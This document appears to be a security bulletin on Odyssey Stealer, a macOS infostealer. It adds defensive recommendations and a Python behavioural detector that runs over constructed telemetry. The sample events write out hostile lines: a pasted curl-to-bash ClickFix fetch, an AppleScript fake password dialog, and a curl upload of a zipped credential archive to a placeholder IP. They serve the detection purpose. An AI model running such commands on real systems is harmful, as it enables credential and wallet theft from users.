Odyssey Stealer: The Rebrand of Poseidon Stealer
Summary:
Odyssey Stealer, a rebrand of Poseidon Stealer (itself forked from AMOS Stealer), has emerged in the macOS malware landscape. It targets users in Western countries and deliberately skips victims in CIS countries. Delivery relies on social engineering: fake App Store prompts and carefully typosquatted domains lead to a "Clickfix" page that instructs the user to paste a command into Terminal, which runs a malicious AppleScript. The stealer harvests browser cookies, saved passwords, cryptocurrency wallet keys and private keys, session tokens, and common document types. It obtains them by displaying a fake system password prompt, copying macOS keychain files, and targeting popular cryptocurrency wallet applications and browser extensions. The collected data is zipped and uploaded to a C2 server, with retry logic so that the upload completes even if the first attempt fails. The operation is run from a web-based command-and-control panel, continuing the evolution of macOS-specific MaaS offerings that began with AMOS, and its author, "Rodrigo," is reportedly still actively involved.
Security Officer Comments:
Campaigns using Odyssey Stealer show how far macOS malware has advanced in both capability and targeting. Its reliance on "Clickfix" social engineering, specifically telling the user to paste a Terminal command from a page dressed up as a CAPTCHA check, shows that manipulating the user remains an effective way around technical controls. The breadth of data taken, from standard credentials to cryptocurrency wallet files, seed phrases and session tokens, points to a financially motivated actor with a clearly defined target demographic. The exclusion of CIS victims is typical of Russian-speaking cybercrime operations, which avoid victims in their home jurisdictions. The reuse of the AMOS codebase and the suspected continued involvement of "Rodrigo" indicate a maturing macOS malware-as-a-service ecosystem in which established developers keep iterating and rebranding their offerings with added capabilities. That professionalization, visible in C2 panel features such as "Google Cookies Restore," marks a shift from opportunistic attacks to well-resourced, sustained, financially motivated operations.
Suggested Corrections:
IOCs are available in the CYFIRMA report linked below.
CYFIRMA recommendations:
- Consume threat intelligence on Odyssey Stealer (lure domains, typosquatted sites, C2 infrastructure) and feed it into blocking and detection controls rather than keeping it as a read-only feed.
- Protect endpoints with a security solution that provides real-time monitoring and behaviour-based detection on macOS, such as an anti-malware suite with host-based intrusion prevention or an EDR agent.
- Monitor network activity with NIDS/NIPS and apply egress filtering. Because the stolen archive is uploaded directly from the endpoint to the C2 server, alerting on unexpected uploads from user workstations is more useful here than inbound web application filtering.
- Configure firewalls and DNS filtering to block outbound communication to IP addresses and domains associated with Odyssey Stealer command-and-control servers.
- Implement behaviour-based monitoring for the infection chain itself: a Terminal session that runs curl and osascript in quick succession, an osascript process reading ~/Library/Keychains or browser cookie and extension stores, and a zip followed by an outbound upload from the same process tree.
- Employ application allowlisting so that only approved applications run on endpoints, preventing unauthorized or malicious executables from launching.
- Only install apps from the official Mac App Store or verified developer sites, and never paste commands from a web page into Terminal, regardless of what the page claims to be verifying.
- Restrict osascript execution unless it is explicitly required for business operations. Where it cannot be blocked outright, alert on osascript invoked from a shell with an inline "-e" script and on AppleScript dialogs that request a password (display dialog ... with hidden answer), which is how the fake password prompt is produced.
- Use security benchmarks to establish baseline hardening procedures and organizational security policies.
- Maintain an incident response plan for stealer infections: isolate the affected system, treat every credential, cookie and session token on it as compromised, rotate those credentials and revoke active sessions, and notify the relevant stakeholders.
- Run security awareness and training programs that cover social engineering, including the "paste this command to fix the problem" pattern. Organizations should remain vigilant and continuously adapt their defenses to the evolving threat posed by Odyssey Stealer.
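The infection chain described in the summary (ClickFix paste, fake password prompt, keychain and browser store access, zip, upload) and the behaviour-based monitoring and osascript recommendations above can be expressed as concrete detection logic. The following Python is an added example written for this page, not code from CYFIRMA or from the malware. The telemetry format is a simplified stand-in for macOS Endpoint Security or EDR process events, the sample events, hostnames, paths and the 203.0.113.5 address are constructed, and the list of processes expected to read credential stores is an assumption to be tuned per fleet.

```python
"""Behavioural detection for the ClickFix -> fake prompt -> credential theft -> exfil chain,
run over constructed telemetry (exec / open / connect records carrying pid, ppid and a timestamp)."""
import re
from collections import defaultdict

TERMINALS = {"Terminal", "iTerm2"}        # session roots for commands a user pastes
STAGE_ONE = {"curl", "base64"}            # fetch/decode step of a pasted ClickFix command
ARCHIVERS = {"zip", "ditto", "tar"}       # staging step before the upload
WINDOW_SECONDS = 60                       # fetch/decode -> inline osascript within this window
INLINE_SCRIPT_RE = re.compile(r"\s-e\s")  # osascript -e '<script>' rather than a .scpt file
FAKE_PROMPT_RE = re.compile(r"display dialog.*hidden answer", re.I | re.S)
SENSITIVE_PATH_RE = re.compile(
    r"/Library/Keychains/"                # login.keychain-db and friends
    r"|/Cookies(\.binarycookies)?$"       # Chromium / Safari cookie stores
    r"|/Login Data$"                      # Chromium saved passwords
    r"|/Local Extension Settings/"        # browser wallet extension storage
    r"|/(Electrum|Exodus)/"               # desktop wallet data directories
)
# Processes expected to read their own stores: an assumed list, tune it for your fleet.
EXPECTED_READERS = {"Safari", "Google Chrome", "Electrum", "Exodus", "securityd"}


def analyze(events):
    findings = []
    parent_of, proc_of = {}, {}           # pid -> ppid / process name, from exec records
    touched = defaultdict(set)            # pid -> sensitive paths it opened
    session_execs = defaultdict(list)     # terminal pid -> [(ts, proc, cmdline), ...]

    def ancestry(pid):                    # pid followed by its known ancestors
        chain = [pid]
        while pid in parent_of and parent_of[pid] not in chain:
            pid = parent_of[pid]
            chain.append(pid)
        return chain

    def session_root(pid):                # nearest terminal app above pid, if any
        return next((p for p in ancestry(pid) if proc_of.get(p) in TERMINALS), None)

    def flag(rule, e, detail):
        findings.append({"rule": rule, "pid": e["pid"], "proc": e["proc"], "detail": detail})

    for e in events:
        kind, pid, cmd = e["type"], e["pid"], e.get("cmdline", "")
        if kind == "exec":
            parent_of[pid], proc_of[pid] = e["ppid"], e["proc"]
            root = session_root(pid)
            if root is not None:
                # ClickFix: fetch/decode followed shortly by an inline osascript anywhere under
                # the same terminal window, so a curl ... | bash indirection does not hide it
                if e["proc"] == "osascript" and INLINE_SCRIPT_RE.search(cmd):
                    prior = [c for t, p, c in session_execs[root]
                             if p in STAGE_ONE and 0 <= e["ts"] - t <= WINDOW_SECONDS]
                    if prior:
                        flag("clickfix_chain", e, f"{cmd} <- preceded by: {prior[-1]}")
                session_execs[root].append((e["ts"], e["proc"], cmd))
            if e["proc"] == "osascript" and FAKE_PROMPT_RE.search(cmd):
                flag("fake_password_prompt", e, cmd)
            if e["proc"] in ARCHIVERS and any(touched.get(p) for p in ancestry(e["ppid"])):
                flag("archive_after_credential_access", e, cmd)
        elif kind == "open":
            if SENSITIVE_PATH_RE.search(e["path"]) and e["proc"] not in EXPECTED_READERS:
                touched[pid].add(e["path"])
                flag("credential_store_access", e, e["path"])
        elif kind == "connect" and any(touched.get(p) for p in ancestry(pid)):
            flag("exfil_after_credential_access", e, e["dest"])
    return findings


# Constructed telemetry, not real IOCs: hosts, paths and 203.0.113.5 are placeholders.
LIB = "/Users/alice/Library"
SAMPLE_EVENTS = [
    {"ts": 0, "type": "exec", "pid": 400, "ppid": 1, "proc": "Terminal", "cmdline": "Terminal"},
    {"ts": 1, "type": "exec", "pid": 500, "ppid": 400, "proc": "zsh", "cmdline": "-zsh"},
    # benign activity in the same session: an API check and a scripted backup run from a file
    {"ts": 2, "type": "exec", "pid": 510, "ppid": 500, "proc": "curl",
     "cmdline": "curl -s https://api.example.invalid/health"},
    {"ts": 10, "type": "open", "pid": 600, "proc": "Google Chrome",
     "path": f"{LIB}/Application Support/Google/Chrome/Default/Cookies"},
    {"ts": 12, "type": "exec", "pid": 511, "ppid": 500, "proc": "osascript",
     "cmdline": "osascript /Users/alice/scripts/backup.scpt"},
    # the user pastes the ClickFix command from a fake CAPTCHA page (curl ... | bash)
    {"ts": 89, "type": "exec", "pid": 501, "ppid": 500, "proc": "curl",
     "cmdline": "curl -fsSL https://verify-captcha.invalid/fix.sh"},
    {"ts": 89, "type": "exec", "pid": 502, "ppid": 500, "proc": "bash", "cmdline": "bash"},
    # the fetched script runs an inline AppleScript that shows a fake system password dialog
    {"ts": 90, "type": "exec", "pid": 503, "ppid": 502, "proc": "osascript",
     "cmdline": "osascript -e 'set pw to text returned of (display dialog "
                '"macOS needs your password to continue" default answer "" with hidden answer)\''},
    {"ts": 91, "type": "open", "pid": 503, "proc": "osascript", "path": f"{LIB}/Keychains/login.keychain-db"},
    {"ts": 92, "type": "open", "pid": 503, "proc": "osascript",
     "path": f"{LIB}/Application Support/Google/Chrome/Default/Cookies"},
    {"ts": 93, "type": "open", "pid": 503, "proc": "osascript",
     "path": f"{LIB}/Application Support/Google/Chrome/Default/Local Extension Settings/ext-id/000003.log"},
    {"ts": 94, "type": "exec", "pid": 504, "ppid": 503, "proc": "zip", "cmdline": "zip -r /tmp/out.zip /tmp/c"},
    {"ts": 95, "type": "exec", "pid": 505, "ppid": 503, "proc": "curl",
     "cmdline": "curl -s -F file=@/tmp/out.zip http://203.0.113.5/upload"},
    {"ts": 96, "type": "connect", "pid": 505, "proc": "curl", "dest": "203.0.113.5:80"},
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"[{f['rule']}] pid={f['pid']} {f['proc']}: {f['detail']}")
```

On the constructed sample the benign curl, the scripted osascript run from a file and Chrome reading its own cookie store produce nothing, while the pasted chain yields seven findings on pids 503 to 505. The two design points worth carrying into a real rule are the session-level correlation (keyed on the terminal window rather than the immediate parent, so the curl | bash hop does not break it) and the requirement that the zip and the outbound connection follow a credential-store read in the same process tree, which keeps ordinary archiving and uploads quiet. In production the events come from eslogger or the EDR's process stream, and both the time window and the expected-reader list need tuning.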
https://www.cyfirma.com/research/odyssey-stealer-the-rebrand-of-poseidon-stealer/